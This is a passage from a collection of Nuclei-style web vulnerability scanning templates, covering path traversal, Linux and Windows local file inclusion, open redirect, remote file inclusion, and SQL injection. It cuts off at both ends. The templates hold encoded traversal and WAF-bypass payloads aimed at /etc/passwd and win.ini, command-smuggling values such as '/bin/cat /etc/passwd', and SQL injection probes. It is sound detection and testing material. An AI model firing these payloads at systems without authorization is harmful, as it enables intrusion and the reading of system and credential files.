"%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f" 16 | fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f" 17 | fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF" 18 | fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF" 19 | fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../" 20 | fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\' 21 | fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../" 22 | 23 | http: 24 | - pre-condition: 25 | - type: dsl 26 | dsl: 27 | - 'method == "GET"' 28 | 29 | payloads: 30 | pathtraversal: 31 | - '{{fuzz}}etc/passwd' 32 | - '{{fuzz}}windows/win.ini' 33 | - '/etc/passwd%00.jpg' 34 | - 'c:/windows/win.ini%00.jpg' 35 | - '{{fuzz}}etc/passwd%00.jpg' 36 | - '{{fuzz}}windows/win.ini%00.jpg' 37 | - '{{fuzz_urlx2_encode}}etc%252fpasswd' 38 | - '{{fuzz_urlx2_encode}}windows%252fwin.ini' 39 | - '{{fuzz_hex_unicode}}etc%u002fpasswd' 40 | - '{{fuzz_hex_unicode}}windows%u002fwin.ini' 41 | - '{{fuzz_utf8_unicode}}etc%C0%AFpasswd' 42 | - '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini' 43 | - '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd' 44 | - '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini' 45 | - '{{fuzz_bypass_replace}}etc/passwd' 46 | - '{{fuzz_bypass_replace}}windows/win.ini' 47 | - '{{fuzz_bypass_replace_windows}}windows\win.ini' 48 | - '{{fuzz_bypass_waf_regx}}etc/passwd' 49 | - '{{fuzz_bypass_waf_regx}}windows/win.ini' 50 | - './web.config' 51 | - '../web.config' 52 | - '../../web.config' 53 | - './WEB-INF/web.xml' 54 | - '../WEB-INF/web.xml' 55 | - '../../WEB-INF/web.xml' 56 | 57 | fuzzing: 58 | - part: query 59 | mode: single 60 | keys: 61 | - cat 62 | - dir 63 | - action 64 | - board 65 | - date 66 | - detail 67 | - file 68 | - download 69 | - path 70 | - folder 71 | - prefix 72 | - include 73 | - page 74 | - inc 75 | - locate 76 | - show 77 | - doc 78 | - site 79 | - type 80 | - view 81 | - content 82 | - document 83 | - layout 84 | - mod 85 | - conf 86 | - url 87 | - img 88 | - image 89 | - images 90 | fuzz: 91 | - "{{pathtraversal}}" 92 | 93 | - part: query 94 | mode: single 95 | values: 96 | - "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$" 97 | fuzz: 98 | - "{{pathtraversal}}" 99 | 100 | stop-at-first-match: true 101 | matchers-condition: or 102 | matchers: 103 | - type: regex 104 | part: body 105 | regex: 106 | - 'root:.*?:[0-9]*:[0-9]*:' 107 | 108 | - type: word 109 | part: body 110 | words: 111 | - 'for 16-bit app support' 112 | 113 | - type: regex 114 | part: body 115 | regex: 116 | - '()' 117 | 118 | - type: regex 119 | part: body 120 | regex: 121 | - '()' 122 | # digest: 490a0046304402204f25e304b713186e620bc4448b9277a9874b77763bbf31e8b099b97bbcab85c702207be12ef346bdc11f03b226da7811a9f0fccbf6dc7e818020cdd707dade3c7508:922c64590222798bb761d5b6d8e72950 123 | -------------------------------------------------------------------------------- /lfi/linux-lfi-fuzz.yaml: -------------------------------------------------------------------------------- 1 | id: linux-lfi-fuzz 2 | 3 | info: 4 | name: Local File Inclusion - Linux 5 | author: DhiyaneshDK 6 | severity: high 7 | reference: 8 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt 9 | - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion 10 | metadata: 11 | max-request: 46 12 | tags: lfi,dast,linux 13 | 14 | http: 15 | - pre-condition: 16 | - type: dsl 17 | dsl: 18 | - 'method == "GET"' 19 | 20 | payloads: 21 | nix_fuzz: 22 | - '/etc/passwd' 23 | - '../../etc/passwd' 24 | - '../../../etc/passwd' 25 | - '/../../../../etc/passwd' 26 | - '../../../../../../../../../etc/passwd' 27 | - '../../../../../../../../etc/passwd' 28 | - '../../../../../../../etc/passwd' 29 | - '../../../../../../etc/passwd' 30 | - '../../../../../etc/passwd' 31 | - '../../../../etc/passwd' 32 | - '../../../etc/passwd' 33 | - '../../../etc/passwd%00' 34 | - '../../../../../../../../../../../../etc/passwd%00' 35 | - '../../../../../../../../../../../../etc/passwd' 36 | - '/../../../../../../../../../../etc/passwd^^' 37 | - '/../../../../../../../../../../etc/passwd' 38 | - '/./././././././././././etc/passwd' 39 | - '\..\..\..\..\..\..\..\..\..\..\etc\passwd' 40 | - '..\..\..\..\..\..\..\..\..\..\etc\passwd' 41 | - '/..\../..\../..\../..\../..\../..\../etc/passwd' 42 | - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd' 43 | - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00' 44 | - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00' 45 | - '%252e%252e%252fetc%252fpasswd' 46 | - '%252e%252e%252fetc%252fpasswd%00' 47 | - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' 48 | - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00' 49 | - '....//....//etc/passwd' 50 | - '..///////..////..//////etc/passwd' 51 | - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd' 52 | - '%0a/bin/cat%20/etc/passwd' 53 | - '%00/etc/passwd%00' 54 | - '%00../../../../../../etc/passwd' 55 | - '/../../../../../../../../../../../etc/passwd%00.jpg' 56 | - '/../../../../../../../../../../../etc/passwd%00.html' 57 | - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd' 58 | - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 59 | - '\\'/bin/cat%20/etc/passwd\\'' 60 | - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 61 | - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 62 | - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 63 | - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 64 | - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' 65 | - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' 66 | - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' 67 | - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' 68 | 69 | fuzzing: 70 | - part: query 71 | type: replace # replaces existing parameter value with fuzz payload 72 | mode: multiple # replaces all parameters value with fuzz payload 73 | fuzz: 74 | - '{{nix_fuzz}}' 75 | 76 | stop-at-first-match: true 77 | matchers: 78 | - type: regex 79 | part: body 80 | regex: 81 | - 'root:.*:0:0:' 82 | # digest: 4a0a0047304502206c53383c7a148e9311173ee5bb2bf1177386db240eff9b2f6d8256e88cbf5f1a022100ddb39020f7957af58c62c6ec59c7094277c8193e4ab089cd4cce994da4d140d8:922c64590222798bb761d5b6d8e72950 83 | -------------------------------------------------------------------------------- /lfi/windows-lfi-fuzz.yaml: -------------------------------------------------------------------------------- 1 | id: windows-lfi-fuzz 2 | 3 | info: 4 | name: Local File Inclusion - Windows 5 | author: pussycat0x 6 | severity: high 7 | metadata: 8 | max-request: 39 9 | tags: lfi,windows,dast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | win_fuzz: 19 | - '\WINDOWS\win.ini' 20 | - '\WINDOWS\win.ini' 21 | - '\WINDOWS\win.ini%00' 22 | - '\WINNT\win.ini' 23 | - '\WINNT\win.ini%00' 24 | - 'windows/win.ini%00' 25 | - '../../windows/win.ini' 26 | - '....//....//windows/win.ini' 27 | - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini' 28 | - '../../../../../windows/win.ini' 29 | - '/..///////..////..//////windows/win.ini' 30 | - '/../../../../../../../../../windows/win.ini' 31 | - './../../../../../../../../../../windows/win.ini' 32 | - '/...\...\...\...\...\...\...\...\...\windows\win.ini' 33 | - '/.../.../.../.../.../.../.../.../.../windows/win.ini' 34 | - '/..../..../..../..../..../..../..../..../..../windows/win.ini' 35 | - '/....\....\....\....\....\....\....\....\....\windows\win.ini' 36 | - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' 37 | - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' 38 | - '..%2f..%2f..%2f..%2fwindows/win.ini' 39 | - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' 40 | - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' 41 | - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' 42 | - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' 43 | - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' 44 | - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' 45 | - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' 46 | - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' 47 | - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' 48 | - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' 49 | - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' 50 | - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' 51 | - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' 52 | - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' 53 | - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' 54 | - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' 55 | - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' 56 | - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' 57 | - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' 58 | 59 | fuzzing: 60 | - part: query 61 | type: replace # replaces existing parameter value with fuzz payload 62 | mode: multiple # replaces all parameters value with fuzz payload 63 | fuzz: 64 | - '{{win_fuzz}}' 65 | 66 | stop-at-first-match: true 67 | matchers: 68 | - type: word 69 | part: body 70 | words: 71 | - "bit app support" 72 | - "fonts" 73 | - "extensions" 74 | condition: and 75 | # digest: 4a0a00473045022100a6f8ee294173fc629f71ec9dfe9c61ad2fbec55dce015a895d126264c15db4f902204dd04d624e3dd7f4bc7cec991d5d87df7c33db24bf681c23b6f18564abfbf644:922c64590222798bb761d5b6d8e72950 76 | -------------------------------------------------------------------------------- /redirect/open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: open-redirect 2 | 3 | info: 4 | name: Open Redirect Detection 5 | author: princechaddha,AmirHossein Raeisi 6 | severity: medium 7 | metadata: 8 | max-request: 1 9 | tags: redirect,dast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | redirect: 19 | - "oast.me" 20 | 21 | fuzzing: 22 | - part: query 23 | mode: single 24 | keys: 25 | - AuthState 26 | - URL 27 | - _url 28 | - callback 29 | - checkout 30 | - checkout_url 31 | - content 32 | - continue 33 | - continueTo 34 | - counturl 35 | - data 36 | - dest 37 | - dest_url 38 | - destination 39 | - dir 40 | - document 41 | - domain 42 | - done 43 | - download 44 | - feed 45 | - file 46 | - file_name 47 | - file_url 48 | - folder 49 | - folder_url 50 | - forward 51 | - from_url 52 | - go 53 | - goto 54 | - host 55 | - html 56 | - http 57 | - https 58 | - image 59 | - image_src 60 | - image_url 61 | - imageurl 62 | - img 63 | - img_url 64 | - include 65 | - langTo 66 | - load_file 67 | - load_url 68 | - login_to 69 | - login_url 70 | - logout 71 | - media 72 | - navigation 73 | - next 74 | - next_page 75 | - open 76 | - out 77 | - page 78 | - page_url 79 | - pageurl 80 | - path 81 | - picture 82 | - port 83 | - proxy 84 | - r 85 | - r2 86 | - redir 87 | - redirect 88 | - redirectUri 89 | - redirectUrl 90 | - redirect_to 91 | - redirect_uri 92 | - redirect_url 93 | - reference 94 | - referrer 95 | - req 96 | - request 97 | - ret 98 | - retUrl 99 | - return 100 | - returnTo 101 | - return_path 102 | - return_to 103 | - return_url 104 | - rt 105 | - rurl 106 | - show 107 | - site 108 | - source 109 | - src 110 | - target 111 | - to 112 | - u 113 | - uri 114 | - url 115 | - val 116 | - validate 117 | - view 118 | - window 119 | - back 120 | - cgi 121 | - follow 122 | - home 123 | - jump 124 | - link 125 | - location 126 | - menu 127 | - move 128 | - nav 129 | - orig_url 130 | - out_url 131 | - query 132 | - auth 133 | - callback_url 134 | - confirm_url 135 | - destination_url 136 | - domain_url 137 | - entry 138 | - exit 139 | - forward_url 140 | - go_to 141 | - goto_url 142 | - home_url 143 | - image_link 144 | - load 145 | - logout_url 146 | - nav_to 147 | - origin 148 | - page_link 149 | - redirect_link 150 | - ref 151 | - referrer_url 152 | - return_link 153 | - return_to_url 154 | - source_url 155 | - target_url 156 | - to_url 157 | - validate_url 158 | - DirectTo 159 | - relay 160 | 161 | fuzz: 162 | - "https://{{redirect}}" 163 | 164 | - part: query 165 | mode: single 166 | values: 167 | - "https?://" # Replace HTTP URLs with alternatives 168 | fuzz: 169 | - "https://{{redirect}}" 170 | 171 | stop-at-first-match: true 172 | matchers-condition: and 173 | matchers: 174 | - type: regex 175 | part: header 176 | regex: 177 | - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 178 | 179 | - type: status 180 | status: 181 | - 301 182 | - 302 183 | - 307 184 | # digest: 4a0a00473045022100d5d09d72be494c1eb95fd874c9d31cee1ac9e14d7d578419fa0a8298c9f8ca9002202e00bd1843e97bb9160eb898cea0a3301321571d4d65ea7c4bce6b90f9dc82fa:922c64590222798bb761d5b6d8e72950 185 | -------------------------------------------------------------------------------- /rfi/generic-rfi.yaml: -------------------------------------------------------------------------------- 1 | id: generic-rfi 2 | 3 | info: 4 | name: Generic Remote File Inclusion 5 | author: m4lwhere 6 | severity: high 7 | reference: 8 | - https://www.invicti.com/learn/remote-file-inclusion-rfi/ 9 | metadata: 10 | max-request: 1 11 | tags: rfi,dast,oast 12 | 13 | http: 14 | - pre-condition: 15 | - type: dsl 16 | dsl: 17 | - 'method == "GET"' 18 | 19 | payloads: 20 | rfi: 21 | - "https://rfi.nessus.org/rfi.txt" 22 | 23 | fuzzing: 24 | - part: query 25 | mode: single 26 | fuzz: 27 | - "{{rfi}}" 28 | 29 | stop-at-first-match: true 30 | matchers: 31 | - type: word 32 | part: body # Confirms the PHP was executed 33 | words: 34 | - "NessusCodeExecTest" 35 | # digest: 490a00463044022029d2873c4bd52bc2237f5807f6053de597738e331d83ff8661e78b54b9f8eabc02200aef90a617b1a1997f782d347cdea43e3cba3e453b60aa77148a0632bade8d7c:922c64590222798bb761d5b6d8e72950 36 | -------------------------------------------------------------------------------- /sqli/cves/CVE-2022-34265.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2022-34265 2 | 3 | info: 4 | name: Django - SQL injection 5 | author: princechaddha 6 | severity: critical 7 | description: | 8 | An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. 9 | reference: 10 | - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265 11 | - https://nvd.nist.gov/vuln/detail/CVE-2022-34265 12 | - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/ 13 | - https://docs.djangoproject.com/en/4.0/releases/security/ 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 16 | cvss-score: 9.8 17 | cve-id: CVE-2022-34265 18 | cwe-id: CWE-89 19 | tags: sqli,dast,vulhub,cve,cve2022,django 20 | 21 | variables: 22 | rand_string: '{{rand_text_alpha(15, "abc")}}' 23 | 24 | http: 25 | - method: GET 26 | path: 27 | - "{{BaseURL}}" 28 | 29 | fuzzing: 30 | - part: query 31 | fuzz: 32 | - "test'{{rand_string}}" 33 | 34 | matchers-condition: and 35 | matchers: 36 | - type: word 37 | part: body 38 | words: 39 | - 'syntax error at or near "{{rand_string}}"' 40 | - 'LINE 1: SELECT DATE_TRUNC' 41 | condition: and 42 | 43 | - type: status 44 | status: 45 | - 500 46 | -------------------------------------------------------------------------------- /sqli/error-based-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: sqli-error-based 2 | 3 | info: 4 | name: Error based SQL Injection 5 | author: geeknik,pdteam 6 | severity: critical 7 | description: | 8 | Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, 9 | or to override valuable ones, or even to execute dangerous system level commands on the database host. 10 | This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . 11 | metadata: 12 | max-request: 3 13 | tags: sqli,error,dast 14 | 15 | http: 16 | - pre-condition: 17 | - type: dsl 18 | dsl: 19 | - 'method == "GET"' 20 | 21 | payloads: 22 | injection: 23 | - "'" 24 | - "\"" 25 | - ";" 26 | 27 | fuzzing: 28 | - part: query 29 | type: postfix 30 | fuzz: 31 | - "{{injection}}" 32 | 33 | stop-at-first-match: true 34 | matchers-condition: and 35 | matchers: 36 | - type: word 37 | part: body 38 | words: 39 | - "Adminer" 40 | negative: true 41 | # False Positive 42 | 43 | - type: regex 44 | regex: 45 | # MySQL 46 | - "SQL syntax.*?MySQL" 47 | - "Warning.*?\\Wmysqli?_" 48 | - "MySQLSyntaxErrorException" 49 | - "valid MySQL result" 50 | - "check the manual that (corresponds to|fits) your MySQL server version" 51 | - "Unknown column '[^ ]+' in 'field list'" 52 | - "MySqlClient\\." 53 | - "com\\.mysql\\.jdbc" 54 | - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" 55 | - "Pdo[./_\\\\]Mysql" 56 | - "MySqlException" 57 | - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" 58 | # MariaDB 59 | - "check the manual that (corresponds to|fits) your MariaDB server version" 60 | # Drizzle 61 | - "check the manual that (corresponds to|fits) your Drizzle server version" 62 | # MemSQL 63 | - "MemSQL does not support this type of query" 64 | - "is not supported by MemSQL" 65 | - "unsupported nested scalar subselect" 66 | # PostgreSQL 67 | - "PostgreSQL.*?ERROR" 68 | - "Warning.*?\\Wpg_" 69 | - "valid PostgreSQL result" 70 | - "Npgsql\\." 71 | - "PG::SyntaxError:" 72 | - "org\\.postgresql\\.util\\.PSQLException" 73 | - "ERROR:\\s\\ssyntax error at or near" 74 | - "ERROR: parser: parse error at or near" 75 | - "PostgreSQL query failed" 76 | - "org\\.postgresql\\.jdbc" 77 | - "Pdo[./_\\\\]Pgsql" 78 | - "PSQLException" 79 | # Microsoft SQL Server 80 | - "Driver.*? SQL[\\-\\_\\ ]*Server" 81 | - "OLE DB.*? SQL Server" 82 | - "\\bSQL Server[^<"]+Driver" 83 | - "Warning.*?\\W(mssql|sqlsrv)_" 84 | - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" 85 | - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" 86 | - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 87 | - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" 88 | - "\\[SQL Server\\]" 89 | - "ODBC SQL Server Driver" 90 | - "ODBC Driver \\d+ for SQL Server" 91 | - "SQLServer JDBC Driver" 92 | - "com\\.jnetdirect\\.jsql" 93 | - "macromedia\\.jdbc\\.sqlserver" 94 | - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" 95 | - "com\\.microsoft\\.sqlserver\\.jdbc" 96 | - "Pdo[./_\\\\](Mssql|SqlSrv)" 97 | - "SQL(Srv|Server)Exception" 98 | - "Unclosed quotation mark after the character string" 99 | # Microsoft Access 100 | - "Microsoft Access (\\d+ )?Driver" 101 | - "JET Database Engine" 102 | - "Access Database Engine" 103 | - "ODBC Microsoft Access" 104 | - "Syntax error \\(missing operator\\) in query expression" 105 | # Oracle 106 | - "\\bORA-\\d{5}" 107 | - "Oracle error" 108 | - "Oracle.*?Driver" 109 | - "Warning.*?\\W(oci|ora)_" 110 | - "quoted string not properly terminated" 111 | - "SQL command not properly ended" 112 | - "macromedia\\.jdbc\\.oracle" 113 | - "oracle\\.jdbc" 114 | - "Zend_Db_(Adapter|Statement)_Oracle_Exception" 115 | - "Pdo[./_\\\\](Oracle|OCI)" 116 | - "OracleException" 117 | # IBM DB2 118 | - "CLI Driver.*?DB2" 119 | - "DB2 SQL error" 120 | - "\\bdb2_\\w+\\(" 121 | - "SQLCODE[=:\\d, -]+SQLSTATE" 122 | - "com\\.ibm\\.db2\\.jcc" 123 | - "Zend_Db_(Adapter|Statement)_Db2_Exception" 124 | - "Pdo[./_\\\\]Ibm" 125 | - "DB2Exception" 126 | - "ibm_db_dbi\\.ProgrammingError" 127 | # Informix 128 | - "Warning.*?\\Wifx_" 129 | - "Exception.*?Informix" 130 | - "Informix ODBC Driver" 131 | - "ODBC Informix driver" 132 | - "com\\.informix\\.jdbc" 133 | - "weblogic\\.jdbc\\.informix" 134 | - "Pdo[./_\\\\]Informix" 135 | - "IfxException" 136 | # Firebird 137 | - "Dynamic SQL Error" 138 | - "Warning.*?\\Wibase_" 139 | - "org\\.firebirdsql\\.jdbc" 140 | - "Pdo[./_\\\\]Firebird" 141 | # SQLite 142 | - "SQLite/JDBCDriver" 143 | - "SQLite\\.Exception" 144 | - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" 145 | - "Warning.*?\\W(sqlite_|SQLite3::)" 146 | - "\\[SQLITE_ERROR\\]" 147 | - "SQLite error \\d+:" 148 | - "sqlite3.OperationalError:" 149 | - "SQLite3::SQLException" 150 | - "org\\.sqlite\\.JDBC" 151 | - "Pdo[./_\\\\]Sqlite" 152 | - "SQLiteException" 153 | # SAP MaxDB 154 | - "SQL error.*?POS([0-9]+)" 155 | - "Warning.*?\\Wmaxdb_" 156 | - "DriverSapDB" 157 | - "-3014.*?Invalid end of SQL statement" 158 | - "com\\.sap\\.dbtech\\.jdbc" 159 | - "\\[-3008\\].*?: Invalid keyword or missing delimiter" 160 | # Sybase 161 | - "Warning.*?\\Wsybase_" 162 | - "Sybase message" 163 | - "Sybase.*?Server message" 164 | - "SybSQLException" 165 | - "Sybase\\.Data\\.AseClient" 166 | - "com\\.sybase\\.jdbc" 167 | # Ingres 168 | - "Warning.*?\\Wingres_" 169 | - "Ingres SQLSTATE" 170 | - "Ingres\\W.*?Driver" 171 | - "com\\.ingres\\.gcf\\.jdbc" 172 | # FrontBase 173 | - "Exception (condition )?\\d+\\. Transaction rollback" 174 | - "com\\.frontbase\\.jdbc" 175 | - "Syntax error 1. Missing" 176 | - "(Semantic|Syntax) error [1-4]\\d{2}\\." 177 | # HSQLDB 178 | - "Unexpected end of command in statement \\[" 179 | - "Unexpected token.*?in statement \\[" 180 | - "org\\.hsqldb\\.jdbc" 181 | # H2 182 | - "org\\.h2\\.jdbc" 183 | - "\\[42000-192\\]" 184 | # MonetDB 185 | - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" 186 | - "\\[MonetDB\\]\\[ODBC Driver" 187 | - "nl\\.cwi\\.monetdb\\.jdbc" 188 | # Apache Derby 189 | - "Syntax error: Encountered" 190 | - "org\\.apache\\.derby" 191 | - "ERROR 42X01" 192 | # Vertica 193 | - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" 194 | - "/vertica/Parser/scan" 195 | - "com\\.vertica\\.jdbc" 196 | - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" 197 | - "com\\.vertica\\.dsi\\.dataengine" 198 | # Mckoi 199 | - "com\\.mckoi\\.JDBCDriver" 200 | - "com\\.mckoi\\.database\\.jdbc" 201 | - "<REGEX_LITERAL>" 202 | # Presto 203 | - "com\\.facebook\\.presto\\.jdbc" 204 | - "io\\.prestosql\\.jdbc" 205 | - "com\\.simba\\.presto\\.jdbc" 206 | - "UNION query has different number of fields: \\d+, \\d+" 207 | # Altibase 208 | - "Altibase\\.jdbc\\.driver" 209 | # MimerSQL 210 | - "com\\.mimer\\.jdbc" 211 | - "Syntax error,[^\\n]+assumed to mean" 212 | # CrateDB 213 | - "io\\.crate\\.client\\.jdbc" 214 | # Cache 215 | - "encountered after end of query" 216 | - "A comparison operator is required here" 217 | # Raima Database Manager 218 | - "-10048: Syntax error" 219 | - "rdmStmtPrepare\\(.+?\\) returned" 220 | # Virtuoso 221 | - "SQ074: Line \\d+:" 222 | - "SR185: Undefined procedure" 223 | - "SQ200: No table " 224 | - "Virtuoso S0002 Error" 225 | - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" 226 | condition: or 227 | 228 | extractors: 229 | - type: regex 230 | name: mysql 231 | regex: 232 | - "SQL syntax.*?MySQL" 233 | - "Warning.*?\\Wmysqli?_" 234 | - "MySQLSyntaxErrorException" 235 | - "valid MySQL result" 236 | - "check the manual that (corresponds to|fits) your MySQL server version" 237 | - "Unknown column '[^ ]+' in 'field list'" 238 | - "MySqlClient\\." 239 | - "com\\.mysql\\.jdbc" 240 | - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" 241 | - "Pdo[./_\\\\]Mysql" 242 | - "MySqlException" 243 | - "SQLSTATE[\\d+]: Syntax error or access violation" 244 | 245 | - type: regex 246 | name: mariadb 247 | regex: 248 | - "check the manual that (corresponds to|fits) your MariaDB server version" 249 | 250 | - type: regex 251 | name: drizzel 252 | regex: 253 | - "check the manual that (corresponds to|fits) your Drizzle server version" 254 | 255 | - type: regex 256 | name: memsql 257 | regex: 258 | - "MemSQL does not support this type of query" 259 | - "is not supported by MemSQL" 260 | - "unsupported nested scalar subselect" 261 | 262 | - type: regex 263 | name: postgresql 264 | regex: 265 | - "PostgreSQL.*?ERROR" 266 | - 